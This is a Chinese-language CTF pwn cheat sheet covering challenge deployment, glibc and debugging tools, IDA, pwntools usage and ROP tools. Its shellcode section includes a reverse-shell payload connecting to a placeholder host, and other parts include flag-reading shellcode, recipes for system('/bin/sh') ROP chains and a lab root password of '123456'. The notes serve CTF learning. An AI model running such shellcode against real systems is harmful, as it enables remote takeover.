出题知识
gcc编译pwn题时:
- NX:-z execstack / -z noexecstack (关闭 / 开启) 不让执行栈上的数据,于是JMP ESP就不能用了
- Canary:-fno-stack-protector /-fstack-protector / -fstack-protector-all (关闭 / 开启 / 全开启) 栈里插入cookie信息
- PIE:-no-pie / -pie (关闭 / 开启) 地址随机化,另外打开后会有get_pc_thunk
- RELRO:-z norelro / -z lazy / -z now (关闭 / 部分开启 / 完全开启) 对GOT表是否具有写权限
- Arch:-m32对文件进行32位的编译,-m64进行64位编译
使用ctf_xinetd项目搭建部署pwn出题环境,尝试了多题部署但最终未能实现,于是转向单题部署且能打通test1
部署过程:
1
2
3
4
5
6
7
8
|
git clone https://github.com/Eadom/ctf_xinetd
#把flag和二进制程序放入bin目录中,并且按照readme修改ctf.xinetd
#在ctf_xinetd目录下构建容器
docker build -t "pwn" .
#运行该镜像(pub_port: 想要放置的端口)
docker run -d -p "0.0.0.0:pub_port:9999" -h "pwn" --name="pwn" pwn
|
相关命令:
1
2
3
4
5
6
7
8
9
10
11
|
# 查看端口连接:
sudo netstat -antp | grep docker
# 查看连接所在进程:
sudo lsof -i:[port_number]
# 断开连接:
sudo kill -9 [PID]
# 关闭docker
docker kill [PID]
|
出现镜像冲突
1
2
|
docker ps -a
docker rm [CONTAINER ID]
|
2台pwn机su root密码更改为了123456
出题时要考虑
1
2
3
|
setbuf(stdin, 0);
setbuf(stdout, 0);
fflush(stdout); //手动刷新缓冲区,将缓冲区输出到屏幕
|
工具
Docker
1
2
3
4
5
6
7
8
|
docker pull xxx/xxx:last # 拉取docker镜像
docker images # 查看镜像
docker rmi <CONTAINER IMAGE ID> # 删除镜像
docker start <CONTAINER ID> # 开启容器
docker stop <CONTAINER ID> # 关闭容器
docker ps -a # 查看容器
docker rm -f <CONTAINER ID> # 删除容器
|
生成容器
1
|
sudo docker run -p 18022:22 -p 18080:80 -i -t mcc0624/flask_ssti:last bash -c '/etc/rc.local; /bin/bash'
|
sudo docker run
:运行Docker容器。
-p 18022:22
:将容器内的SSH服务绑定到主机的18022端口,以便可以通过SSH连接到容器内。
-p 18080:80
:将容器内的Web服务绑定到主机的18080端口,以便可以通过Web浏览器访问容器内的Web应用程序。
-i -t
:以交互式和伪终端的方式运行容器。
mcc0624/flask_ssti:last
:使用mcc0624/flask_ssti:last镜像作为容器的基础镜像。
bash -c '/etc/rc.local; /bin/bash'
:在容器内执行两个命令,分别为执行/etc/rc.local
和启动一个交互式的Bash终端(/bin/bash
)
--name
:容器命名
1
2
|
docker attach ID # 离开容器,容器停止
docker exec -it ID /bin/bash # 离开容器,容器仍运行
|
Pwndocker
使用:
1
2
|
docker-compose up -d
docker exec -it pwn_test /bin/bash
|
docker与主机传文件
1
2
3
|
docker ps -a #查看CONTAINER ID 或 NAMES
docker inspect -f '{{.Id}}' NAMES #根据ID或NAMES拿到ID全称
docker cp 本地文件路径 ID全称:容器路径
|
在自定义libc版本中运行
1
2
3
|
cp /glibc/2.27/64/lib/ld-2.27.so /tmp/ld-2.27.so
patchelf --set-interpreter /tmp/ld-2.27.so ./test
LD_PRELOAD=./libc.so.6 ./test
|
或
1
2
|
from pwn import *
p = process(["/path/to/ld.so", "./test"], env={"LD_PRELOAD":"/path/to/libc.so.6"})
|
checksec
1
|
checksec --file={file_name}
|
Glibc-all-in-one
多版本libc
1
2
3
4
5
|
./libc-x.xx.so # 查看相应版本的链接器
cd glibc-all-in-one
cat list or cat old_list
sudo ./download x.xx-xubuntux_amd64 #下载glibc,会存放在libs文件夹中
sudo ./download_old x.xx-xubuntux_xxx #下载old_list中的
|
若无法下载,可以进入官网(ubuntu、清华镜像)找到deb文件自行下载下来拷贝到debs文件夹中,libs相应文件中创建.debug
文件,执行:
1
2
|
sudo ./extract debs/libc6_x.xx-0ubuntu5_amd64.deb libs/x.xx-0ubuntu5_amd64/
sudo ./extract ~/libc6-dbg_2.26-0ubuntu2_i386.deb libs/x.xx-0ubuntu5_amd64/.debug/
|
LibcSearcher
1
2
3
4
5
|
from LibcSearcher import *
libc = LibcSearcher("printf", printf_addr)
libc_base = write_addr - libc.dump("write")
system_addr = libc_base + libc.dump("system")
binsh_addr = libc_base + libc.dump("str_binsh")
|
Patchelf
若无相应链接将会产生错误
1
|
./pwn: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./pwn)
|
一般情况
1
2
3
4
|
jshiro@ubuntu:~/Desktop/ctf/smashes$ ldd ./elf
linux-vdso.so.1 (0x00007fff3c996000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fb20380c000)
/lib64/ld-linux-x86-64.so.2 (0x00007fb203a46000)
|
改变程序的链接库路径,使用工具修改libc文件
1
2
3
4
5
6
7
8
9
10
|
sudo ln ld-x.xx.so /lib64/ld-x.xx.so
#生成符号连接以使gdb能够调试,若未设置跳转到pwndbg调试解决问题
# libc 和 ld 都需要有可执行权限
patchelf --set-interpreter ld-x.xx.so elf # 来修改文件ld.so
patchelf --replace-needed old_libc.so new_libc.so elf # 来修改文件libc.so
#尽量使用相对路径
# 可成功执行
patchelf --set-interpreter ./glibc-all-in-one/libs/ubuntu/ld.so --set-rpath ./glibc-all-in-one/libs/ubuntu elf
|
或者
1
|
p = process(['~/name/x.xx-3ubuntu1_amd64/ld-x.xx.so', './elf'], env={"LD_PRELOAD":'~/name/x.xx-3ubuntu1_amd64/libc.so.6'})
|
注意:在单个libc版本中还有多个版本,需要多次在本地尝试
需要在gdb中设置
1
|
set debug-file-directory debug/
|
尽量下载最新版本ubuntu或kali机,若只有低版本libc2.31在后续调试堆时使用glibc-all-in-one可能使用不了gdb
1
|
sudo seccomp-tools dump ./xxx #查看是否存在沙箱保护,只能执行允许的系统调用函数
|
tmux
命令行
1
2
|
tmux ls # 查看session
tmux new -t name # 创建新的session, name
|
tmux指令
prefix默认为ctrl + b
,gdb.attach
先要打开tmux
ctrl + B + d
可从tmux中退出且保留tmux,重新进入输入tmux a-t name/number
ctrl + B + t
显示时间
配置
1
2
3
4
5
|
# Tmux启用鼠标 + 可使用滚轮滑动
touch ~/.tmux.conf
set -g mouse on # 启动鼠标 shift选中内容, ctrl+insert复制, shift+insert粘贴
# 右键快捷栏 可拖动
tmux source-file ~/.tmux.conf
|
复制:
ctrl + b + [
进入复制模式,移到目标位置
ctrl + 空格键
开始复制,方向键移动选择复制区域
alt + w
复制选中文本并退出复制模式
- 按下
ctrl + b + ]
粘贴文本
Pane指令:
1
2
3
4
5
6
7
8
|
ctrl + b + " #下方新建 改为-
ctrl + b + % #右方新建 改为|
ctrl + b + x #关闭
ctrl + b + [space] # 调整布局
ctrl + b + z # 面板缩放, 最大最小化
ctrl + B + 上下左右键 # 转换屏幕
ctrl + B + [ # 可实现上下翻页
Ctrl + b + o #光标切换到下一个窗格
|
Window指令:
1
2
3
4
5
6
7
|
ctrl + b + c # 新建窗口
ctrl + b + & # 关闭
Ctrl + b + 0~9 # 切换到指定索引窗口
Ctrl + b + p # 切换到上一个窗口
Ctrl + b + n # 切换到下一个窗口
ctrl + b + w # 列出windows
ctrl + b + , # 重命名
|
分屏复用
1
2
3
4
5
|
tmux list-sessions #查看sessions
tmux list-windows #查看windows
tmux list-panes #查看panes
tmux send-keys -t <sessions>:<windows>.<panes> "content" Enter
|
ropper
1
2
|
#寻找gadget
ropper --file [file_name] --nocolor --search "汇编指令"
|
IDA
注:
一般直接进入Exports
中找start
IDA虚拟地址的偏移很可能不可靠
显示机器码:Options > General > Number of opcode bytes > 10
字符串不连接在一起,使用Edit
> Export data
选择如何导出
粉色函数表明:外部函数,生成在extern
段中
单键
- 对变量按
n
重命名,/
添加注释
- 对函数按键
x
可以看到索引-交叉引用(何处被调用)
- 按
y
可以看到函数及变量声明,可以修改参数、数据类型,u
可以undefine
函数,p
将代码分析为函数
r
可以将数字转为字符,h
还原为数字,u
还原为原数据
g
输入地址可直接跳转,c
让某一个位置变为指令
tab
键切换汇编和反编译图
右键
- 将数字转化为十六进制、十进制、八进制、字符类型显示
> Collapse declarations
:折叠一长串变量
> Keypatch > Patcher
:修改汇编代码
> Mark as decompiled
:标记已经反编译完的
> Copy to assembly
:汇编与c语言代码对照显示
组合键
补充符号表:制作签名文件
1
2
3
4
|
sudo cp /lib/x86_64-linux-gnu/libc.a . # 放入Flair工具文件夹中
./pelf libc.a libc-2.XX.pat # 生成libc-2.XX.exc中删除注释自动处理冲突
./sigmake ./libc-2.XX.pat libc-2.XX.sig # 放入IDA sig目录 pc下
# IDA: View > Open subviews > Signatures > 右键 > Apply new signature...
|
结构体直接创建分析:
View
> Open subviews
> Local types
or shift + F1
右键
> Insert
or ins键
- 写入新的结构体,不断更新,F5重新反编译
-
1
2
3
4
5
6
|
struct somestruct{
type xxx;
_DWORD unknown_0; //4字节
char buf[64]; //0x40
void* ptr; //指针先用void*,之后可将void更改为对应的数据类型
};
|
- 同样可以使用
typedef
将长的类型取别名
IDA例子解析
1
2
3
4
|
.rodata:08048668 data db 'a',0
.rodata:08048668 ; DATA XREF: main+49↑o
#rodata只读数据节 DATA XREF表示该字符串在main的多少偏移中引用
|
F5伪代码
1
2
3
4
5
6
7
8
9
10
11
|
__int64 a1@<rbp> // a1 通过 rbp 寄存器传递
setbuf(stdin, 0);
setbuf(stdout, 0); //用于将输入输出缓冲区关闭,直接输出到屏幕输入到相应位置
setbuf(bss_start, 0); // 禁用 bss_start 文件流处的缓冲区, 每次读写立即系统调用
LODWORD(x); // 从x中提取低位dword
HIDWORD(x); // 从x中提取高位dword
(0x4002c7)(var); // 地址形式调用函数 =func(var)
*((_QWORD *)o + 3) = a; // 表示将a函数地址放在o指针向后偏移 3 * 8 bytes的位置
|
IDA反汇编函数转栈帧:
1
2
3
4
5
6
7
|
// 变量多尽量使用esp的相对偏移来分析栈帧
char **v3; // ST04_4
int v4; // ST08_4
char src; // [esp+12h] [ebp-10Eh]
char buf; // [esp+112h] [ebp-Eh]
_DWORD *v8; // [esp+11Ch] [ebp-4h]
|
栈帧结构:调用函数foo,则对栈帧进行改变
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
|
from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux', terminal = ['tmux', 'sp', '-h'])
# log_level='fatal' 完全不输出
context.terminal = ['tmux', 'split-w', '-h'] # 需要保证tmux已经运行
io = process("./xxx") # pid xxxx
io = gdb.debug("./xxx")
io = remote("ip", port)
gdb.attach(io, "b main")
gdb.attach(io, "b *$rebase(0x偏移地址)\nc")
gdb.attach(io, "c"*200)
text = io.recvline()[a:b] # 可以使用切片获取返回值
io.recv()
io.recvline()
io.recvuntil(b'xxx\n') # 直到接受到\n
io.send(p32(0) + b"abc\x0a") # 输入必须为字节流, 前一个sendline可能影响后一个send
io.sendline(b"") # 自动加一个\n换行
io.send(b'xxx\n') # 在送入不包含\n时还需要人工输入\n才会getshell
io.sendlineafter(b"xx", input_something)
#取返回值(地址)的方法,输入以 "a"结尾
p.recvuntil(b"0x")
address = int(p.recvuntil(b"a", drop=True), 16)
# 直接接受0xabc, False不接收\n
addr = int(p.recvline(False), 16)
#64位中获取地址
u64(p.recv(6).ljust(8, "\x00"))
addr = u64(io.recv(8)) - 10
# 自使用获取栈地址stack addr 0x10需自调整
addr = io.recvuntil(',')[:-1]
ebp_addr = int("0x" + str(addr[::-1].hex()), 16) - 0x10
# 32位
u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))
# 64位
u64(p.recvuntil("\x7f")[-6:].ljust(8, "\x00"))
# printf %s, %p 不需小端序转换
int(p.recvline()[:-1], 16)
leak_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(leak_addr))
success("libcBase -> {:#x}".format(libcBase)) # x表示转化为16进制 打印
# 快捷填充垃圾数据
cyclic(0x10)
# p64(8): 0x0000000000000008
# `\x00` 为一字节
bin_sh = libc_base_addr + libc.search(b'/bin/sh', , executable=True).__next__()
pop_rdi = libc_base_addr + libc.search(asm('pop rdi;ret;')).__next__()
io.interactive()
|
shellcode模块
1
2
3
4
5
6
7
8
9
10
11
12
|
context.arch = "amd64"
print(asm(shellcraft.sh())) # shellcode汇编代码直接转化为机器码 32位机器shellcode
print(asm(shellcraft.amd64.sh())) # 64位机器的shellcode
shellcode = asm(pwnlib.shellcraft.amd64.linux.cat2("/flag", 1, 0x30))#读取/flag,输出到标准输出
shellcode = asm(pwnlib.shellcraft.amd64.linux.socket("ipv4", "tcp") +\
pwnlib.shellcraft.amd64.linux.connect("x.x.x.x", 8888, 'ipv4')+\
pwnlib.shellcraft.amd64.linux.dupsh('rax'))
#反弹shell
asm(shellcraft.sh()).ljust(100, b'A') #ljust在shellcode基础上左对齐,后面补充A直到100个
|
1
2
3
4
5
6
7
8
9
10
11
12
13
|
# 32位
shellcode = ''
shellcode += shellcraft.open('./flag')
shellcode += shellcraft.read('eax','esp',0x100)
shellcode += shellcraft.write(1,'esp',0x100)
shellcode = asm(shellcode)
# 64位
shellcode = ''
shellcode += shellcraft.open('./flag')
shellcode += shellcraft.read('rax','rsp',0x100)
shellcode += shellcraft.write(1,'rsp',0x100)
shellcode = asm(shellcode)
|
elf+libc
1
2
3
4
5
6
7
8
9
10
11
|
# 返回整型
elf = ELF("./xxx") # 获取ELF文件的信息
hex(next(elf.search(b"/bin/sh"))) # 获取/bin/sh的地址
hex(elf.address) # 获取文件基地址
hex(elf.symbols['函数/变量/符号名']) # 获取函数/变量/符号地址
hex(elf.got['函数名']) # 获取函数在got表表项的地址
hex(elf.plt['函数名']) # 获取函数PLT地址
libc = ELF("libc.so.6") # 获取libc文件信息, 若函数在libc中而不在文件的plt中, 使用此找函数偏移
hex(libc.sym['函数名']) # 已泄露出libc基址后获取对应函数
offset = libc.sym['system'] - libc.sym['puts']
|
ROP
1
2
|
rop = ROP(elf)
pop_rdi_ret = rop.find_gadget(['pop rdi', 'ret'])[0]
|
heap统一函数操作:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
def add(size):
p.recvuntil('choice: ')
p.sendline('1')
p.recvuntil('size?')
p.sendline(str(size))
def edit(idx,content):
p.recvuntil('choice: ')
p.sendline('2')
p.recvuntil('idx?')
p.sendline(str(idx)) # 有时为 str(idx).encode()
p.recvuntil('content:')
p.sendline(content)
def show(idx):
p.recvuntil('choice: ')
p.sendline('3')
p.recvuntil('idx?')
p.sendline(str(idx))
def delete(idx):
p.recvuntil('choice: ')
p.sendline('4')
p.recvuntil('idx?')
p.sendline(str(idx))
|
pwndbg
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
|
#下断点
b malloc # exp调试时下断点在malloc函数
b *0x8048000 # 汇编地址
b main
b 9 # c语言行号
b xx if i=100 # 条件断点
b *$rebase(0x偏移地址) # 应对PIE
info b #查看断点
d num #删除断点
disable num # 使断点不能
# 断在函数下,先调试找到 call malloc@plt 的地址,再下断点
set args 1 2 3 4 # 设置参数
set *(unsigned long long* )address = xx
set $rax = xx
start #进入入口
r #运行
finish # 跳出,执行到函数返回处
# 查看栈帧信息
info frame 0 # 0 为索引
#步进stepin 进入函数
s #C语言级
si #汇编语言级
#步过next 跳过函数
n #C语言级
ni #汇编语言级
c #继续 从断点到另一个断点
u 0xabc # 显示汇编码
u &func
backtrace # bt显示函数调用关系
k # 查看函数
return # 从函数出来
# core文件在程序段错误时会产生,通过ulimit命令开启
gdb elf_file core # 调试到dump的位置
gdb elf_file PID
#寻找 <正则>
search xxx
search -p 0xabcdef # 寻找数据
x/10gx $rsp+0x10 # 查看寄存器内容
#打印
p 符号 # 打印符号的值, 如: ptr指针指向的值
p 变量
p sizeof(array_var)
p system
p &printf # printf函数的地址
p/x *(long *)($rbp-0x40) # 查看rbp-0x40地址处的值,十六进制形式
p/d $rsp # 查看rsp寄存器中的值,十进制形式
p $rsp+0x50 # 查看rsp+0x50的地址 假设回显$1
p $rsp - $1 # 可以此查看rsp与$1地址的距离
x/20gz &_IO_2_1_stdout_ # 查看IO_FILE结构
p _IO_2_1_stdout_
p x = 1 # 改值
p main_arena # 查看main_arena
p &main_arena.mutex # 地址
print &__libc_argv[0] # 找到变量地址
dc address num# hexdump查看某地址内容
#格式化字符串中,自动计算格式化参数与address的偏移
fmtarg address # The index of format argument : 10 ("\%9$p")
# 求偏移
distance address1 address2
#查看栈 数量
stack xxx # esp 和 ebp 之间的是当前执行的函数的栈帧,ebp 指向的是前一个函数的 ebp 的值
0xffff → 0xfffc ← 'aaa' # 表示0xffff地址处存放着一个指针,指针指向'aaa'
telescope address # 类似看栈的方式查看内存
vmmap #获取调试进程中节的虚拟映射地址范围, 可见到内存中的动态链接库区域
vmmap 0xabc # 查看其在虚拟映射地址中位置
libc # libc基址
got # 查看got表
plt # 查看plt表
canary # 查看canary
tls # 查看tls
p *(struct pthread*)address
set detach-on-fork off # 同时调试父进程与子进程
pwndbg # 查看命令
retaddr # 查看返回地址
|
查看内存:
1
2
3
4
5
6
7
8
9
10
|
x/nfu <addr>
# n:表示要显示的内存单元个数
# f:表示显示方式 x:十六进制 d:十进制 u:十进制无符号整型 o:八进制
# t:二进制 a:十六进制 i:指令地址格式 c:字符格式
# f:浮点数格式 s:字符串形式
# u:表示一个地址单元的长度 b:单字节 h:双字节 w:四字节 g:八字节
x/10gx address # 一般
x/20i func # 查看函数反汇编代码
x/80ga address # 常用
|
exp动态调试:
- exp的输入send前加入
raw_input()
,然后执行exp,
ps -ef | grep pwn_elf
找到PID
- 另一个窗口
gdb attach PID
,在gdb中disass main
找到漏洞点和结束前的断点位置,b * 0xaaaa
,输入c
,在exp中回车。
- 或代码中在开头加入
gdb.attach(io)
,在每次发送payload前加入pause()
可多次调试,然后终端任意按键查看gdb变化
堆调试
1
2
3
4
5
|
fastbin # 查看fastbins
heap # 查看堆
arenainfo # 查看main_arena
vis # 不同颜色可查看堆情况
tcache # tcache详细信息
|
解决问题:
1
2
3
4
5
6
7
8
9
|
pwndbg> heap
heap: This command only works with libc debug symbols.
They can probably be installed via the package manager of your choice.
See also: https://sourceware.org/gdb/onlinedocs/gdb/Separate-Debug-Files.html
E.g. on Ubuntu/Debian you might need to do the following steps (for 64-bit and 32-bit binaries):
sudo apt-get install libc6-dbg
sudo dpkg --add-architecture i386
sudo apt-get install libc-dbg:i386
|
该命令可查看单独调试信息文件的目录show debug-file-directory
- 用gdb进行调试,显示一些堆栈格式需要在gdb中设置debug文件夹,从
glibc-all-in-one
中复制.debug
文件夹到题目目录中
1
|
cp -r ~/tools/glibc-all-in-one/libs/x.xx-3ubuntu1_amd64/.debug/ ./debug
|
- gdb中设置
debug file
就能正常使用gdb功能
1
|
set debug-file-directory debug/
|
Pwngdb
1
2
3
4
5
6
|
parseheap # 解析堆的排布
magic # 打印 glibc 中有用的变量和函数
heapinfoall # 打印所有线程堆的信息
bcall # 在所有xx函数调用下断点
tls # 打印线程本地存储地址
fpchain # 显示FILE的链接列表
|
gdb-dashboard
1
2
3
|
#下载 适合单独调试 调IOT
wget -P ~ https://github.com/cyrus-and/gdb-dashboard/raw/master/.gdbinit
pip install pygments
|
GDB调试组合:
pwndbg + Pwngdb
:适用于userland pwn
gef + Pwngdb
:适用于qemu/kernel pwn
ROPgadget
生成构造ROP链
1
2
|
ROPgadget --binary xxxfile --only "pop|ret" | grep rdi # 只含有pop和ret的指令
ROPgadget --binary xxx --ropchain # 自动生成ROP链
|
one_gadget
1
2
3
4
5
6
|
one_gadget libc_file # 一个地址就可以完成攻击目的
# 获取libc文件中的一个利用路径,即找到libc偏移xxx地址的地方,满足约束条件即可一步getshell
# 构造libcBase + xxx(地址)覆盖return地址即可
one_gadget -b [BuildID[sha1] of libc] #BuildID用file获取
one_gadget xxxxxx -l 2
|
VSCODE
shift+alt+↓
:快捷复制一行
调试时监控
双击
&var
可以看var变量的地址
&var.subvar
可以看var结构体的其中一个类型变量的地址
滚轮中键下滑可以编辑多行
git
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
|
git init # git初始化, 会生成.git文件
git help init # 查看帮助
git status # 查看git commit状态
git add file # 加入cache缓冲区
git add -p file # 交互式添加文件 s拆分 y添加暂存区 n不添加暂存区 q退出
git commit -m "name" # 从缓冲区提交
git log --all --graph --decorate --oneline # 查看提交情况及信息
git cat-file -p <object> # <object>是一个对象的哈希值, 查看某个commit对象的详细信息
git checkout <object/branch> # 工作目录和索引切换到指定的对象或引用或分支
git diff <object> file # 可以查看某个提交与当前工作目录(HEAD)间文件的更改
git diff <object1> <object2> file # 比较两次提交间文件变化
git diff --cached # 查看已暂存的更改
git branch # 列出本地分支, * 标记当前分支, -r 远程分支, -a 所有分支 -vv 更详细
git branch <branch-name> # 创建新分支
git branch --set-upstream-to=<remote_name>/<remote_branch> # 关联本地分支和远程分支
git checkout -b <new-branch> # 创建并切换到新分支
git merge xx # 合并分支到主分支
git merge --abort # 发生冲突时使用命令暂停 进入文件会有冲突提示, 删除并修改
git add file; git merge --continue # 解决冲突继续前先将文件加入cache缓冲区
git remote # 查看远程仓库
git remote add origin <url> # 将新的远程仓库添加到本地git仓库
git push <remote_name> <local branch>:<remote branch>
# git push origin master:master 本地分支更改提交到远程仓库指定分支
git fetch # 下载最新提交和更新
git pull = git fetch; git merge # 下载最新信息后合并更新到本地分支
git clone --shallow # 只包含最近的提交,而不是整个提交历史
git stash # 临时保存当前工作目录和暂存区的更改到堆栈
git stash pop # 恢复并删除stash
vim .gitignore # 将需要忽略不提交的文件写入, 可用正则匹配
|
Linux
readelf
1
2
3
4
5
|
readelf -e xxx # 分析ELF程序的工具,可以查看所有节头信息
readelf -S xxx # 节表
readelf -l a.out # 程序头表/段表 整理节表组成内存页, 且按权限分了类, 可以看到未运行文件大小和运行后内存大小
readelf -r a.out # 重定位表
readelf -s a.out # 符号表 主要链接和调试中使用, strip elf命令去掉后IDA分析只能分析出sub_XXXX
|
objdump
1
|
objdump -d xxx -M intel # 分析二进制文件的工具
|
hexdump——分析文件的十六进制
ldd
1
2
3
4
5
|
jshiro@ubuntu:~/Desktop/ctf$ ldd elf # 用于查看程序连接的所有库
linux-vdso.so.1 (0x00007ffc561bb000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f17383a4000)
/lib64/ld-linux-x86-64.so.2 (0x00007f17385de000)
#libc.so.6软连接
|
strings
1
|
strings elf # 查看一些字符串如/bin/sh
|
gcc
1
2
3
4
5
6
7
8
|
-S # 汇编
-g # gdb调试时显示c源代码而不是汇编代码
-pthread # 使用多线程
--static # 静态链接
-Wall -Wextra # 开启告警
nasm -f elf32/elf64 xxx # 编译
ld -m elf_i386/elf_x86_64 xxx # 链接
|
nc
1
2
|
nc ip port
nc -lvp 8888 -e ./pwn # 映射程序 IO
|
Debian
- Debian安装python包时不用pip install命令,而是直接使用
apt install python3-包名
- 将安装包tar.gz下载后解压
-
1
2
3
|
tar xzf xxx.tar.gz
cd xxx
python3 setup.py install
|
-
1
2
3
4
5
|
# 使用虚拟环境
apt install python3-venv
pthon3 -m venv myenv
source myenv/bin/activate
pip install xxx
|
Makefile
变量定义
1
2
3
4
5
6
7
|
% # 通配符
$@ # 目标
$< # 所有目标依赖
$^ # 目标依赖列表中第一个依赖
$? # 所有目标依赖中被修改过的文件
$* # 当前目标中的 % 部分
$(object) # 使用object变量
|
举例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
<targets ...>: <prereq ...> # targets 依赖于 prereq, 若prereq改变, targets也得重新生成
command # 命令生成 targets
.PHONY: all clean # 定义的伪目标一定会被执行
PWD := $(shell pwd) # 获取相对路径
TARGET := $(foreach <var>, <list>, <text>) # <list>中逐一取出到<var>, 执行<text>表达式
all:
<targets ...>: <target-pattern>: <prereq-patterns ...>
# targets: 目标文件, 即最终输出文件
# target-pattern: targets的模式,目标集模式,%表示匹配任意文件名
# prereq-patterns: 目标的“依赖”元素
clean:
@-rm $(DIR_TARGET)*
# @表示不回显命令,-表示忽略错误,不中断makefile执行,*是通配符,表示匹配目录下的所有文件
|
基础知识
计组
CPU架构
CPU
amd64是X86架构的CPU,64位版。amd64又叫X86_64。主流的桌面PC,笔记本电脑,服务器(包括虚拟机)都在用X86_64的CPU
arm64是ARM架构的CPU,64位版。有些路由器、嵌入式设备、手机、安卓平板电脑在用arm64的CPU
MIPS是MIPS架构的CPU。有些嵌入式设备和家用路由器在用MIPS的CPU
x86架构
x86 和 x86_64 : 基于X86架构的不同版本, 位数不同,32位和64位,其中x86_64 = x64 = amd64
x86版本是Intel率先研发出x86架构, x86_64版本(也称x64)是amd率先研发x86的64位版本, 所以x86_64也叫amd64
x86:一个地址存4个字节;amd64:一个地址存8个字节
CPU包含4个层:Ring0-Ring4,Ring3为用户态,Ring0为内核态
Glibc
- glibc-2.23:ubuntu16.04
- glibc-2.27:ubuntu18.04
- glibc-2.29:ubuntu19.04
- glibc-2.30~31:ubuntu20.04
- glibc-2.34:ubuntu22.04
ubuntu下查看glibc
版本
1
2
3
4
5
|
getconf GNU_LIBC_VERSION
ldd --version
./libc.so.6 # 执行libc文件查看版本
strings libc.so.6 | grep ubuntu # 查看给定libc对应ubuntu版本
strings libc.so.6 | grep version # 查看libc版本
|
Mips
32个通用寄存器
编号 |
名称 |
描述 |
$0 or $zero |
0号寄存器,始终为0 |
|
$1 or $at |
保留寄存器 |
|
$2-$3 |
$v0-$v1 |
values,保存表达式或函数返回结果 |
$4-$7 |
$a0-$a3 |
argument,作为函数前4个参数 |
$8-$15 |
$t0-$t7 |
temporaries,供汇编程序使用的临时寄存器 |
$16-$23 |
$s0-$s7 |
Saved values,子函数使用时需先保存原寄存器的值 |
$24-$25 |
$t8-$t9 |
temporaries,临时寄存器,补充$t0-$t7 |
$26-$27 |
$k0-$k1 |
保留,中断处理函数使用 |
$28 or $gp |
Global pointer,全局指针 |
|
$29 or $sp |
Stack pointer,堆栈指针,指向堆栈的栈顶 |
|
$30 or $fp |
Frame pointer,保存栈指针 |
|
$31 or $ra |
Return address,返回地址 |
|
特殊寄存器
- PC(程序计数器)
- HI(乘除结果高位寄存器)
- LO(乘除结果低位寄存器)
Assembly
1
2
3
4
5
6
7
8
|
lea ; 加载内存地址
mov ; 传递内存地址中的值
test eax, eax ; 等价于eax & eax, 不影响eax值, 改变标志寄存器值, 判断eax是否为0, 为0则设置ZF
push xx ; esp先减小, 将xx的值压入栈中, 即放入esp所指地址
call func ; 将call的下一条命令压入栈, jmp到func地址去, call完ret时, call的下一条命令会出栈, 存入eip中执行, 而call的函数的参数仍留在了栈中
hello: db "hello", 0xa ;将字符串 "hello" 和一个换行符存储在内存中
len: equ $-hello ;equ类似于定义/等于, $ 表示当前地址的符号,而 -hello 表示 len 到 hello 的距离
|
AVX指令集中的SIMD(Single Instruction Mutiple Data)指令,处理256位
1
2
|
vmovdqa ymmword ptr [rcx + 60h], ymm1
# 将ymm1寄存器中的256位数据存储到内存地址[rcx + 0x60]处 ymmword: 32字节
|
寄存器
1
2
3
4
|
rax: 64
eax: 32
ax: 16
al,ah: 8
|
C
1
2
3
4
5
6
7
8
9
10
11
12
|
#pragma once // 防止头文件被多次包含, 告诉编译器只包含该头文件一次
printf("123456\r321\n"); // \r用于回到当前行的开头, \r后边的数字替代这一行最开始的相等数目的数字
// output: 321456, 隐藏了123
putchar(10); // 换行
printf("\x1B[2J\x1B[H"); // x1B:ESC, [2J:清屏, [H:光标移至左上角
if ( v1 == -1 ) xxx; //v1为空或无效
if ( v1 == 10 ) xxx; //v1为换行符,ASCII值为10
void *ptr[2]; // 声明大小为2的指针数组
|
注:
- C语言中字符串以"\x00"结尾,篡改字符串中的"\x00"可以导致泄露后续数据如canary值
- read函数调用的第一个参数:0标准输入,1标准输出,2标准错误
main
1
2
3
4
5
6
7
8
|
int main(void)
int main(int argc, char *argv[]) = int main(int argc, char **argv)
int main(int argc, char **argv, char **envp)
//argc:参数计数
//argv[0]:文件路径名
//argv[1]:第一个字符串
//argv[2]:第二个字符串
//argv[argc]:NULL
|
内联汇编格式
1
2
3
4
5
6
|
asm volatile(
"instruction list"
:"=r"(xxx) //output
:"r(...)" //input
:
);
|
宏
1
2
3
|
LODWORD(v4) = 0 //初始化低32位为0
HIDWORD(v4) = 0 //初始化高32位为0
SHIDWORD(v4) //取高32位并作为有符号整数
|
SIGSEGV
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
#include <signal.h>
signal(SIGSEGV, sigsegv_handler);
//使用该函数在发生segment fault时会调用自己定义的sigsegv_handler函数
// 可查看对应整数
printf("signal: %d\n", SIGABRT); // 6
printf("signal: %d\n", SIGFPE); // 8
printf("signal: %d\n", SIGILL); // 4
printf("signal: %d\n", SIGINT); // 2
printf("signal: %d\n", SIGSEGV); // 11
printf("signal: %d\n", SIGTERM); // 15
printf("signal: %d\n", SIGALRM); // 14
signal(14, timeout_func);
|
函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
long strtol(const char *str, char **endptr, int base); // 将str指向的字符数组转换为长整型
// endptr: 存储转换后的字符串的结束位置
// base: 转换时使用的进制
chr(i); // 将Unicode码转换为字符
